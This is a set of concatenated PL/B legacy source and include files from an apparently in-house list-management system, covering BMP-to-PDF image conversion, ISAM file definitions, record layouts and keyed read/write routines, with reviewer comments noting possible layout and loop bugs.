MOVE BMPi.width,fm10
WRITE pdffile,seq;" /Width ",fm10
.
MOVE BMPi.height,fm10
WRITE pdffile,seq;" /Height ",fm10
.
WRITE pdffile,seq;" /BitsPerComponent 8" //24 bit images have 8 bit components
WRITE pdffile,seq;" /Length ",strlen
WRITE pdffile,seq;" >>"
.
WRITE pdffile,seq;"stream"
WRITE pdffile,seq;strdat
WRITE pdffile,seq;"endstream"
WRITE pdffile,seq;"endobj"
WRITE pdffile,seq;
.
DFREE strdat
.
. remember this image so later placements reuse the same XObject
MOVE ImageFileName,ImageFNames(pictnum)
MOVE ObjNum,ImageObjNum(pictnum)
MOVE bmpi.width,ImageWidth(pictnum)
MOVE bmpi.height,ImageHeight(PictNum)
.
ELSE
.
. cached image: reuse its slot and rescale from the stored dimensions
SQUEEZE ImageNum,Char2
MOVE ImageNum,pictnum
.
. figure out image scaling and adjust size to prevent stretch
.
MOVE ImageWidth(pictnum),fscratch1
MOVE ImageHeight(pictnum),fscratch2
.
CALC aspecti = pdfpos.width / fscratch1
CALC aspecto = pdfpos.height / fscratch2
IF ( aspecti < aspecto )
MOVE (aspecti*fscratch2), pdfpos.height
ELSE
MOVE (aspecto*fscratch1), pdfpos.width
ENDIF
.
ENDIF
.
. WRITE pages(curpage),seq;"q"
. WRITE pages(curpage),seq;pdfpos," cm" //width ? ? height horz vert
. WRITE pages(curpage),seq;" /Img",*ll,char2," Do"
. WRITE pages(curpage),seq;"Q"
PACK content,"q ",pdfpos," cm /Img",char2," Do Q",CRLF
APPEND content,page(curpage).content
. register the XObject in the page's resource list (built lazily)
TYPE page(curpage).imgres
if EOS
MOVE " ",page(curpage).imgres
endif
APPEND "/Img",page(curpage).imgres
APPEND char2,page(curpage).imgres
APPEND " ",page(curpage).imgres
APPEND ImageObjNum(pictnum),page(curpage).imgres
APPEND " 0 R ",page(curpage).imgres
FUNCTIONEND
.
. convert 16 or 32 bit images to 24 bit
.
. cvt24: convert 16- or 32-bit BMP pixel data to 24-bit (3 bytes/pixel).
. inBitCnt : source bits per pixel (16 assumes a 5-5-5 layout; 32 keeps
. the first 3 bytes of each pixel and drops the 4th)
. data : pixel data in; replaced in place with the 24-bit data
. Bug fixes vs. prior revision:
. - red channel: the 5-bit mask was applied to pixgrn (before pixgrn
. was even loaded) and after the intensify shift; it now masks
. pixred between the right-shift and the left-shift, so the unused
. MSB of the 5-5-5 word is actually stripped.
. - blue channel: the intensify shift was applied to pixgrn a second
. time, leaving blue un-intensified; it now shifts pixblu.
cvt24 LFUNCTION
inBitCnt form 2
data dim ^
entry
inlen form 10
outdata dim ^
pixel dim ^
pixred integer 2
pixgrn integer 2
pixblu integer 2
outpixel integer 3
outpixd dim 3
.
MOVEPLEN Data,inlen
.
.calculate size needed for conversion
.
IF (inBitCnt = 16 )
DIV "2",inlen
DMAKE pixel,2
ELSE
DIV "4",inlen
DMAKE pixel,4
ENDIF
MULT "3",inlen
.
DMAKE outdata,inlen
.
LOOP
REMOVE data,pixel
BREAK IF EOS
IF (inBitCnt=32)
BUMP pixel,4 // strip alpha
MOVE pixel,outpixd
ELSE
.
. break out 16-bit RGB (assumes 5-5-5 scheme)
.
MOVE pixel,pixred
SHIFTRIGHT pixred,10 // right justify red
AND 31,pixred // strip off MSB
SHIFTLEFT pixred,3 // intensify to 8 bits
MOVE pixel,pixgrn
SHIFTRIGHT pixgrn,5 // right justify green
AND 31,pixgrn // strip off red
SHIFTLEFT pixgrn,3 // intensify to 8 bits
MOVE pixel,pixblu
AND 31,pixblu // strip red and green
SHIFTLEFT pixblu,3 // intensify to 8 bits
. assemble 24-bit RGB
MOVE pixred,outpixel
SHIFTLEFT outpixel,8
OR pixgrn,outpixel
SHIFTLEFT outpixel,8
OR pixblu,outpixel
MOVE outpixel,outpixd
ENDIF
.
APPEND outpixd,outdata
REPEAT
RESET outdata
.
MOVE outdata,data
DFREE outdata
DFREE pixel
.
FUNCTIONEND
.
. BMP2PDF: convert raw 24-bit BMP pixel data into a PDF image stream:
. per-pixel BGR -> RGB swap, rows reordered top-down (BMP stores them
. bottom-up), and row-alignment padding removed from the output.
BMP2PDF LFUNCTION
imgdata dim ^
Width integer 4
Height integer 4
ENTRY
scanline dim ^
outimg dim ^
row integer 4
sz integer 4
.
pix dim 3
r integer 1
g integer 1
b integer 1
cntr integer 4
.
. output buffer calculated before alignment size because there should be
. no padding in the PDF stream
.
CALC sz=width*height*3
.
DMAKE outimg,sz
SETLPTR outimg
.
. sz is reused: from here on it is the unpadded bytes per scan line
MOVE Width,sz
MULT "3",sz // 3-bytes per pixel
DMAKE scanline,sz
.
. adjust width for alignment padding
. NOTE(review): this rounds the PIXEL count up to a multiple of 4 and
. then multiplies by 3; BMP pads each row's BYTE count to a multiple
. of 4, so the stride differs for some widths — confirm against the
. producers of this data (cvt24 output carries no padding at all).
ADD "3",width
DIV "4",width
MULT "4",width
.
MULT "3",width // byte count
.
. walk the scan lines
.
FOR row,1,height
MOVE imgdata,scanline
BUMP imgdata,width
.
. NOTE(review): this loop runs sz (= bytes-per-line) iterations while
. consuming 3 bytes per pass — 3x more passes than pixels; the extra
. passes presumably no-op once the pointer runs off the end — confirm.
FOR cntr,1,sz // BGR to RGB
MOVE scanline,pix
UNPACK pix,b,g,r
PACK pix,r,g,b
MOVELS pix,scanline
BUMP scanline,3
REPEAT
RESET scanline
.
. place this (bottom-up) source row at its top-down output position
RESET outimg,(((height-row)*sz)+1)
MOVELS scanline,outimg
REPEAT
.
MOVE outimg,imgdata
DFREE scanline
DFREE outimg
.
FUNCTIONEND
<file_sep>/include/NPNDDD.INC
......................................
.NPNDDD INCLUSION
.NIN Pending, LCR & Pending Cancelled ORDER FILE DEFINITION
.
.FILE NAME: NINPND
.REC LENGTH: 48 FIXED
.INDEX KEY: (1) 1-3 (NPNDCODE + NPNDSTAT; see record layout below)
.
.
. NINPND: pending/LCR/cancelled status-description lookup. ISAM,
. 3-byte key (type code + 2-digit status), fixed 48-byte records.
NPNDNAME INIT "NINPND.isi|NINS1:502"
NPNDFILE IFILE KEYLEN=3,FIXED=48
. NOTE(review): NPNDFLD is 6 bytes while KEYLEN is 3 — confirm whether
. only the first 3 bytes of NPNDFLD are significant for keyed reads.
NPNDFLD DIM 6
NPNDFLAG FORM 1
NPNDPATH FORM 1
NPNDLOCK FORM 1
.
. sentinel flag value used to detect end-of-file on sequential passes
SEQEOF2 FORM "-4"
.
.
NPNDVARS LIST
NPNDCODE DIM 1 001-001 TYPE OF STATUS
."p" = pending
."x" = cancelled
."l" = LCR
NPNDSTAT DIM 2 002-003 STATUS CODE
NPNDDESC DIM 45 004-048 STATUS DESCRIPTION
LISTEND
<file_sep>/include/MDCSegIO.inc
..............................................................................
.******************************************************
.* MSeg List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MSeg DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_Seg
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing MSeg, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : MSegKEY
. REQUIRED : 'MSegFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. MSegKEY: exact keyed read into MSegVars. MSegPath selects the file:
. path 1 reads MSegFile by MSegFld, path 2 reads MSegFile2 by MSegFld2
. (both declared elsewhere). Opens on first use; caller tests flags.
MSegKEY Branch MsegPath to Mseg1a,Mseg1c
MSeg1a BRANCH MSegFlag TO MSeg1b
CALL MSegOpen
MSeg1b FILEPI 1;MSegFile
READ MSegFile,MSegFld;MSegVars
RETURN
MSeg1c BRANCH MSegFlag TO MSeg1d
CALL MSegOpen
MSeg1d FILEPI 1;MSegFile2
READ MSegFile2,MSegFld2;MSegVars
RETURN
..............................................................................
.
. ENTRY POINT : MSegTST
. REQUIRED : MSegFld
. RETURNED :
. DESCRIPTION : TEST KEY
.
. MSegTST: probe a key without loading MSegVars — the record goes into
. STR1 and only the resulting flags matter. Path selection as in MSegKEY.
MSegTST Branch MSegpath to Mseg2a,mSeg2c
Mseg2a BRANCH MSegFlag TO MSeg2b
CALL MSegOpen
MSeg2b FILEPI 1;MSegFile
READ MSegFile,MSegFld;STR1
RETURN
Mseg2c BRANCH MSegFlag TO MSeg2e
CALL MSegOpen
MSeg2e FILEPI 1;MSegFile2
READ MSegFile2,MSegFld2;STR1
RETURN
..............................................................................
.
. ENTRY POINT : MSegKS
. REQUIRED :
. RETURNED : MSeg Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
. MSegKS: key-sequential read (next record in key order) into MSegVars
. from the primary file only. Opens on first use.
MSegKS BRANCH MSegFlag TO MSeg3
CALL MSegOpen
MSeg3 FILEPI 1;MSegFile
READKS MSegFile;MSegVars
RETURN
..............................................................................
. ENTRY POINT : MSegSEQ
. REQUIRED :
. RETURNED : MSeg Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
. MSegSEQ: physical-sequential read into MSegVars from the primary file.
. Caller is responsible for testing the flags (e.g. OVER at EOF).
MSegSEQ BRANCH MSegFlag TO MSeg4
CALL MSegOpen
MSeg4 FILEPI 1;MSegFile
READ MSegFile,SEQ;MSegVars
RETURN
..............................................................................
.
. ENTRY POINT : MSegWRT
. REQUIRED : 'MSegFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
. MSegWRT: insert MSegVars via the MSegFlist filelist (writes both the
. ISAM and AIM members together), under a FILEPI interlock.
MSegWRT BRANCH MSegFlag TO MSeg5
CALL MSegOpen
MSeg5 FILEPI 1;MSegFlist
WRITE MSegFList;MSegVars
RETURN
..............................................................................
.
. ENTRY POINT : MSegUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
. MSegUPD: rewrite the record fetched by a preceding keyed read,
. through the filelist so both index members stay in step.
MSegUPD BRANCH MSegFlag TO MSeg6
CALL MSegOpen
MSeg6
FILEPI 1;MSegFlist
UPDATE MSegFlist;MSegVars
RETURN
..............................................................................
.
. ENTRY POINT : MSegDEL
. REQUIRED : 'MSegFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
. MSegDEL: delete via the filelist under a FILEPI interlock.
. NOTE(review): unlike NSPEDEL, no key operand is supplied here —
. presumably this deletes the record of a preceding keyed read
. (the header says 'MSegFld' is required) — confirm before relying on it.
MSegDEL BRANCH MSegFlag TO MSeg7
CALL MSegOpen
MSeg7 FILEPI 1;MSegFList
DELETE MSegFList
RETURN
..............................................................................
.
. ENTRY POINT : MSegOpen
. REQUIRED : 'MSegFlag' 'MSegPATH'
. RETURNED : 'MSegFlag' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
. MSegOpen: open the MSegFlist filelist and set MSegFlag to 1 on success.
. On IO failure control traps to MSegGONE, which reports via FILEGONE.
MSegOpen TRAP MSegGONE giving error IF IO
OPEN MSegFList
TRAPCLR IO
MOVE C1 TO MSegFlag
RETURN
..............................................................................
MSegGONE MOVE MSegNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/SRDSdd.inc
.******************************************************
.* SRDS List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* SRDS DATACARD FILES.
.* ****************************************************
.
. FILE:
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: XML from SRDS if there is not a hit
. on our system they get put into an indexed/aimdexed file for review
......................................................
. LAST MODIFIED
. patch 1.0 13 April 2011 DLH New
......................................................
.
. SRDS_Main: SRDS datacard staging file, fixed 707-byte records, kept as
. an ISAM (6-byte list-number key) / AIM (53-byte aimdex key) pair that
. the filelist keeps in step. Served by file manager NINS1:502.
SRDSFlist Filelist
SRDSFILE IFILE fixed=707,Name="SRDS_Main.Isi|NINS1:502"
SRDSFILE2 AFILE fixed=707,Name="SRDS_Main.AAm|NINS1:502"
FilelistEnd
SRDSNAME Init "SRDS_Main|NINS1:502"
SRDSFLAG FORM 1
SRDSPATH FORM 1
SRDSLock FORM 1
SRDSFLd Dim 6
SRDSfld2 Dim 53 .aim key
SRDSCSVSTR DIM 800
.
SRDSVARS LIST .
SRDSLSTNUM DIM 6 1-6 ZERO FILLED KEY.
SRDSOWNNUM DIM 6 7-12 OWNER NUMBER (KEY FOR NINOWN FILES)
SRDSDATFUL DIM 6 13-18 FULFILLMENT NUMBER
SRDSDATMAN DIM 6 19-24 MANAGER
SRDSPRICE Form 4.2 25-31 Base Price
SRDSNLSTCDE DIM 1 32-32 NEW LIST CODE (Y or N).
SRDSHOTLINE DIM 1 33-33 HOTLINE CODE (Y or N).
SRDSNEWDATE DIM 8 34-41 DATE CARD PUT UP CCYYMMDD FORMAT
SRDSREVDATE DIM 8 42-49 REVISION DATE CCYYMMDD FORMAT - PRINTED ON DATACARD data date (use last clean date)
SRDSPASSWORD DIM 10 50-59 WHOM LAST UPDATED CARD - PRINTED ON DATACARD
SRDSMLSTNAME DIM 75 60-134 MASTER LIST NAME.
SRDSCLEANCDE DIM 4 135-138 CLEANED CODE (Cxxx).
SRDSCLNINFO DIM 38 139-176 CLEAN INFORMATION.
SRDSNETNAME DIM 4 177-180 NET NAME CODE (Nxxx).
SRDSNETINFO DIM 38 181-218 NET NAME INFORMATION.
SRDSDELCODE DIM 4 219-222 DELIVERY CODE (Dxxx).
SRDSSAMPLE DIM 4 223-226 SAMPLE CODE (Pxxx).
SRDSSEX DIM 15 227-241 SEX TEXT. OFF 1 BYTE
SRDSMIN DIM 11 242-252 MINIMUM TEXT.
SRDSUNIVERSE DIM 10 253-262 UNIVERSE QUANTITY.
SRDSUNITDATA DIM 188 263-450
SRDSNDATUPDDATE DIM 8 451-458 UPDATE DATE touched date
. NOTE(review): SRDSCOMMPER is declared DIM 6 but spans positions
. 459-467 (9 bytes) — the width and offsets disagree; confirm which
. is authoritative before editing this layout.
SRDSCOMMPER DIM 6 459-467 COMMISSION.
SRDSNDATVerf Dim 8 468-475 Date info last confirmed data
SRDSNdatMen form 3.2 476-481 percent men
SRDSNdatFem Form 3.2 482-487 percent female
SRDScntct Dim 50 488-537
SRDScphone RECORD 538-547
SRDScphone1 Dim 3
SRDScphone2 Dim 3
SRDScphone3 Dim 4
REcordend
SRDScFax Record 548-557
SRDScFax1 dim 3
SRDScFax2 dim 3
SRDScFax3 dim 4
RecordEnd
SRDScEmail Dim 50 558-607
SRDSStatus Dim 1 608-608
SRDSNDatFill Dim 99 609-707
LISTEND
<file_sep>/include/SRDSSELIO.inc
..............................................................................
.******************************************************
.* SRDSSEL List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* SRDSSEL DATACARD FILES.
.* ****************************************************
.
. FILE: SRDS_SEL
. LENGTH: Fixed=140
. COMPRESS: NONE
. TYPE: Isam
......................................................
...............................................
. ENTRY POINT : SRDSSELKEY
. REQUIRED : 'SRDSSELFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
.	Exact key read. SRDSSELPath selects the access path (1 = ISAM via
.	SRDSSELFld, 2 = AIM via SRDSSELFld2); file is opened on first use.
.	Record is returned in SRDSSELVars; caller must test I/O flags.
SRDSSELKEY Branch SRDSSELPath to SRDSSEL1a,SRDSSEL1c
SRDSSEL1a BRANCH SRDSSELFlag TO SRDSSEL1b skip open if already opened
	CALL SRDSSELOpen
SRDSSEL1b FILEPI 1;SRDSSELFile lock for the read
	READ SRDSSELFile,SRDSSELFld;SRDSSELVars
	RETURN
SRDSSEL1c BRANCH SRDSSELFlag TO SRDSSEL1d skip open if already opened
	CALL SRDSSELOpen
SRDSSEL1d FILEPI 1;SRDSSELFile2 lock for the read
	READ SRDSSELFile2,SRDSSELFld2;SRDSSELVars
	RETURN
..............................................................................
.
. ENTRY POINT : SRDSSELTST
. REQUIRED : SRDSSELFld
. RETURNED :
. DESCRIPTION : TEST KEY
.
.	Key test read: same path selection as SRDSSELKEY but the record is
.	read into STR1 (throwaway) - used only to test whether the key exists.
SRDSSELTST Branch SRDSSELpath to SRDSSEL2a,SRDSSEL2c
SRDSSEL2a BRANCH SRDSSELFlag TO SRDSSEL2b skip open if already opened
	CALL SRDSSELOpen
SRDSSEL2b FILEPI 1;SRDSSELFile
	READ SRDSSELFile,SRDSSELFld;STR1
	RETURN
SRDSSEL2c BRANCH SRDSSELFlag TO SRDSSEL2e skip open if already opened
	CALL SRDSSELOpen
SRDSSEL2e FILEPI 1;SRDSSELFile2
	READ SRDSSELFile2,SRDSSELFld2;STR1
	RETURN
..............................................................................
.
. ENTRY POINT : SRDSSELKS
. REQUIRED :
. RETURNED : SRDSSEL Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
.	Key-sequential read (next record in key order) into SRDSSELVars;
.	ISAM file only. Opens the files on first use.
SRDSSELKS BRANCH SRDSSELFlag TO SRDSSEL3 skip open if already opened
	CALL SRDSSELOpen
SRDSSEL3 FILEPI 1;SRDSSELFile
	READKS SRDSSELFile;SRDSSELVars
	RETURN
..............................................................................
.
. ENTRY POINT : SRDSSELKS1
. REQUIRED :
. RETURNED : SRDSSEL VALID READ OR NO
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
.	Key-sequential read variant: record goes into SRDSSELLIST
.	instead of SRDSSELVars. Opens the files on first use.
SRDSSELKS1 BRANCH SRDSSELFlag TO SRDSSEL3A skip open if already opened
	CALL SRDSSELOpen
SRDSSEL3A FILEPI 1;SRDSSELFile
	READKS SRDSSELFile;SRDSSELLIST
	RETURN
..............................................................................
. ENTRY POINT : SRDSSELSEQ
. REQUIRED :
. RETURNED : SRDSSEL Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
.	Physical-sequential read into SRDSSELVars; caller tests I/O flags
.	for end-of-file. Opens the files on first use.
SRDSSELSEQ BRANCH SRDSSELFlag TO SRDSSEL4 skip open if already opened
	CALL SRDSSELOpen
SRDSSEL4 FILEPI 1;SRDSSELFile
	READ SRDSSELFile,SEQ;SRDSSELVars
	RETURN
..............................................................................
.
. ENTRY POINT : SRDSSELWRT
. REQUIRED : 'SRDSSELFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
.	Insert SRDSSELVars through the filelist so both the ISAM and AIM
.	views are written together. Opens the files on first use.
SRDSSELWRT BRANCH SRDSSELFlag TO SRDSSEL5 skip open if already opened
	CALL SRDSSELOpen
SRDSSEL5 FILEPI 1;SRDSSELFlist
	WRITE SRDSSELFList;SRDSSELVars
	RETURN
..............................................................................
.
. ENTRY POINT : SRDSSELUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
.	Rewrite the record fetched by a previous key read; goes through the
.	filelist so both views stay in step. Opens the files on first use.
SRDSSELUPD BRANCH SRDSSELFlag TO SRDSSEL6 skip open if already opened
	CALL SRDSSELOpen
SRDSSEL6
	FILEPI 1;SRDSSELFlist
	UPDATE SRDSSELFlist;SRDSSELVars
	RETURN
..............................................................................
.
. ENTRY POINT : SRDSSELDEL
. REQUIRED : 'SRDSSELFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
.	Delete the current record through the filelist (both views).
.	Opens the files on first use.
SRDSSELDEL BRANCH SRDSSELFlag TO SRDSSEL7 skip open if already opened
	CALL SRDSSELOpen
SRDSSEL7 FILEPI 1;SRDSSELFList
	DELETE SRDSSELFList
	RETURN
..............................................................................
.
. ENTRY POINT : SRDSSELOpen
. REQUIRED : 'SRDSSELFlag' 'SRDSSELPATH'
. RETURNED    : 'SRDSSELFlag' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
.	Open the SRDSSEL filelist; on I/O failure the trap routes to
.	SRDSSELGONE which reports the file name via FILEGONE (no return).
.	On success SRDSSELFlag is set to 1 so callers skip reopening.
SRDSSELOpen TRAP SRDSSELGONE giving error IF IO
	OPEN SRDSSELFList
	TRAPCLR IO
	MOVE C1 TO SRDSSELFlag flag the files as open
	RETURN
.	Error path: hand the display name to the common FILEGONE handler.
SRDSSELGONE MOVE SRDSSELNAME TO FILENAME
	CALL FILEGONE
.
..............................................................................
<file_sep>/include/nrtndd104.inc
; Last change: DLH 6/13/2002 11:01:20 AM
;.............................................................................
;
; NRTNDD INCLUSION
; NIN RETURN-TO FILE DEFINITION
;
; FILE NAME : NINRTN
; REC LENGTH: 227 FIXED. INDEX KEY : 1-4 (4 POSITION RTN#)
; AIM KEY : 50-94
;
. RElease 1.3 24Apr07 DLH added file manager
. RElease 1.2 12April2007 DLH inactive byte
. RElease 1.1 19AUG98 ASH Y2K CONVERSION
;.............................................................................
;
.	NINRTN file handles and work fields (ISAM key 1-4, AIM key 50-94).
NRTNFILE IFILE KEYLEN=4,FIXED=227,UNCOMP,Name="NINRTN.isi|10.10.30.104:502"
NRTNNAME INIT "NINRTN|10.10.30.104:502 "
NRTNFLE2 AFILE aim view of NINRTN
NRTNFLE3 FILE FIXED=227 plain sequential view
NRTNFLD DIM 7 isam key work field
NRTNFLD2 DIM 48 aim key work field
NRTNFLAG FORM 1 open flag for NRTNFILE
NRTNFLG2 FORM 1 open flag for NRTNFLE2
NRTNFLG3 FORM 1 open flag for NRTNFLE3
NRTNPATH FORM 1 access path selector
NRTNLOCK FORM 1 0 or 1=File Locks, 2=Record Locks, 3=No Locks
;
;..............................................................................
*
.	NINRTN record layout (fixed 227 bytes).
rtnvars list
RTNUM DIM 4 1-4 RETURN-TO NUMBER. **KEY**
;RTCNTCT DIM 25 5-29 RETURN-TO CONTACT NAME.
RTCNTCT DIM 45 5-49 RETURN-TO CONTACT NAME.
;RTCOMP DIM 25 30-54 RETURN-TO COMPANY NAME.
RTCOMP DIM 45 50-94 RETURN-TO COMPANY NAME. (AIM KEY)
RTADDR DIM 25 95-119 RETURN-TO ADDRESS.
RT2ADDR DIM 25 120-144 RETURN-TO ADDRESS2.
RTCITY DIM 15 145-159 RETURN-TO CITY.
RTSTATE DIM 2 160-161 RETURN-TO STATE.
RTZIP DIM 10 162-171 RETURN-TO ZIP.
RTCOUN DIM 15 172-186 RETURN-TO COUNTRY CODE
RTNAME DIM 10 187-196 PASSWORD NAME
;RTREVDAT DIM 6 117-122 REVISED DATE.
RTREVDAT DIM 8 197-204 REVISED DATE.
.RTBLANK DIM 3 205-207 NOT-USED.
RTBLANK DIM 2 205-206 NOT-USED.
RTActive Dim 1 207-207 ' ','Y'=active 'N' = do not use
RTTELE DIM 10 208-217 TELEPHONE
RTFAX DIM 10 218-227 FAX NUMBER.
listend
;
LISTOFF
;PROGRAM ACCESS.
;F:\LIBRARY\PLB_SRC
;NAME TYPE ACCESS
;NCHK002L PLS READ
;NINC0007 PLS READ
;NINV0001 PLS READ
;NINV0003 PLS READ
;NINV002L PLS READ
;NINV0099 PLS READ
;NMRG0001 PLS READ
;NMRG0002 PLS READ
;NORD0001 PLS READ
;NORD0009 PLS READ
;NORD0023 PLS READ
;NORD0024 PLS READ
;NORD002L PLS READ
;NORD013B PLS READ
;NORD013C PLS READ
;NORD013D PLS READ
;NORD013E PLS READ
;NORD013Z PLS READ
;NRTN0001 PLS READ,WRITE,UPDATE
;NRTN0002 PLS READ
;NRTN7777 PLS READ
;NSHP0001 PLS READ
;NXCH0001 PLS READ
;NXCH0099 PLS READ
;F:\LIBRARY\DEVELOP
;NAME TYPE ACCESS
;NMPL0001 PLS READ
;NMPL0002 PLS READ
;F:\APPS\PLB\CODE
;NAME TYPE ACCESS
;EOM1ST WBT
;MISC WBT
;PERGE WBT
;FRIDAY BAK
;FRIDAY WBT
LISTON
<file_sep>/include/ncmp2dd.inc
...................................................
.
. NCMP2DD INCLUSION
. NIN/Integral cross reference file for Campaign file
. FILE NAME : NINCMP2.DAT
. REC LENGTH: 53 FIXED
. INDEX KEY : (1) 001-006 (Campaign Num)
. (2) 007-024 (Integral Scenario ID)
. AAMDEX KEY: (1) 001-006 (Campaign Num)
. (2) 007-024 (Integral Campaign ID)
. (3) 025-025 (Update Byte)
.
.
.	NIN/Integral campaign cross-reference file handles and record layout.
NCMP2NAME INIT "NINCMP2 "
NCMP2NME1 INIT "NINCMP2A"
NCMP2FLIST Filelist
NCMP2FILE IFILE KEYLEN=6,FIXED=53,Name="NINCMP2.isi|NINS1:502"
NCMP2FLE1 IFILE KEYLEN=18,FIXED=53,Name="NINCMP2A.isi|NINS1:502"
NCMP2FLE2 AFILE FIXED=53,Name="NINCMP2.aam|NINS1:502"
.NCMP2FILE IFILE KEYLEN=6,FIXED=53,Name="NINCMP2|20.20.30.103:502"
.NCMP2FLE1 IFILE KEYLEN=18,FIXED=53,Name="NINCMP2A|20.20.30.103:502"
.NCMP2FLE2 AFILE FIXED=53,Name="NINCMP2|20.20.30.103:502"
	filelistend
NCMP2FLD DIM 6 Campaign Number(ISAM)
NCMP2FLD1 DIM 18 Integral Scenario ID(ISAM)
NCMP2FLD2 DIM 9 Campaign Number(AAM)
NCMP2FLD3 DIM 21 Integral Scenario ID(AAM)
NCMP2FLD4 DIM 4 Update Byte(AAM)
NCMP2FLAG FORM 1 open flag
NCMP2PATH FORM 1 access path selector
NCMP2LOCK FORM 1 0/1=FILEPI, 2=RECORD LOCK, 3=NO LOCK
.
NCMP2VARS LIST
NCMP2Num DIM 6 001-006 Campaign Number(Key)
NCMP2INum DIM 18 007-024 Integral Scenario ID(Key)
NCMP2Upd DIM 1 025-025 Update Byte: '0'=No Update necessary, '1'=Need to Update Integral
NCMP2UDate DIM 8 026-033 Update Date
NCMP2Filler DIM 20 034-053 Filler/reserved (comment previously said "Update Date" - copy/paste)
listend
<file_sep>/include/SCHEDULE.INC
.
. MAILDATE FILE RECORD SIZE 27 FIXED
. .............
. NOTE(review): fields below define bytes 1-26; with a 27-byte record,
. byte 27 is undefined - confirm intended.
.
SCHKEY DIM 6 1-6 LIST NUMBER
SCHYEAR DIM 2 7-8 YEAR SCHEDULED (ASSUMED TO BE CURRENT YEAR IF
. NOT SPECIFIED).
SCHMONTH DIM 2 9-10 MONTH SCHEDULED
SCHDAY DIM 2 11-12 DAY SCHEDULED (ALWAYS A MONDAY).
SCHMLR DIM 7 13-19 MAILER DESC KEYED IN
SCHQUANT DIM 7 20-26 QUANTITY SCHEDULED KEYED IN.
.
.
. NINMDLST FILE RECORD SIZE 152 FIXED.
. .............
.
.SCHKEY DIM 6 KEY - LIST NUMBER 1-6
SCHLINE1 DIM 70 LINE ONE DESCRIPTION. 7-76
SCHLINE2 DIM 68 LINE TWO DESCRIPTION. 77-144
SCHCODE DIM 1 SCHEDULING ALLOWED = ' ' 145-145
SCHLCRCD DIM 1 LCR'S ALLOWED = ' ' 146-146
SCHPLAN DIM 3 PLANNERS INITIALS 147-149
SCHCALL DIM 3 CALLERS INITIALS 150-152
.
<file_sep>/include/NADJIO.inc
..............................................................................
.
. NADJIO INCLUSION
. NIN ADJUSTMENT FILE I/O ROUTINES
.
. FILE NAME : NINADJ
.
.patch 1.1 new structure use adjvars
..............................................................................
.
. ENTRY POINT : NADJKEY
. REQUIRED : 'NADJFLD'
. RETURNED : MASTER ADJUSTMENT RECORD
. DESCRIPTION : EXACT ISAM KEY READ
.
.	Exact ISAM key read of NINADJ (key in NADJFLD) into adjvars;
.	opens the file on first call.
NADJKEY BRANCH NADJFLAG TO NADJ1 skip open if already opened
	CALL NADJOPEN
NADJ1 FILEPI 1;NADJFILE lock for the read
	READ NADJFILE,NADJFLD;adjvars
	RETURN
..............................................................................
.
. ENTRY POINT : NADJTST
. REQUIRED : 'NADJFLD'
. RETURNED :
. DESCRIPTION : ISAM KEY TEST READ
.
.	Key test read: record goes into STR1 (throwaway) - used only to
.	test whether NADJFLD exists. Opens the file on first call.
NADJTST BRANCH NADJFLAG TO NADJ2 skip open if already opened
	CALL NADJOPEN
NADJ2 FILEPI 1;NADJFILE
	READ NADJFILE,NADJFLD;STR1
	RETURN
..............................................................................
.
. ENTRY POINT : NADJKS
. REQUIRED :
. RETURNED : MASTER ADJUSTMENT RECORD
. DESCRIPTION : KEY SEQUENTIAL MASTER ADJUSTMENT FILE READ
.
.	Key-sequential read (next record in key order) into adjvars;
.	opens the file on first call.
NADJKS BRANCH NADJFLAG TO NADJ3 skip open if already opened
	CALL NADJOPEN
NADJ3 FILEPI 1;NADJFILE
	READKS NADJFILE;adjvars
	RETURN
..............................................................................
.
. ENTRY POINT : NADJSEQ
. REQUIRED :
. RETURNED : MASTER ADJUSTMENT RECORD
. DESCRIPTION : SEQUENTIAL MASTER ADJUSTMENT FILE READ
.
.	Physical-sequential read into adjvars; caller tests I/O flags
.	for end-of-file. Opens the file on first call.
NADJSEQ BRANCH NADJFLAG TO NADJ4 skip open if already opened
	CALL NADJOPEN
NADJ4 FILEPI 1;NADJFILE
	READ NADJFILE,SEQ;adjvars
	RETURN
..............................................................................
.
. ENTRY POINT : NADJWRT
. REQUIRED : 'NADJFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
.	Insert adjvars under key NADJFLD; opens the file on first call.
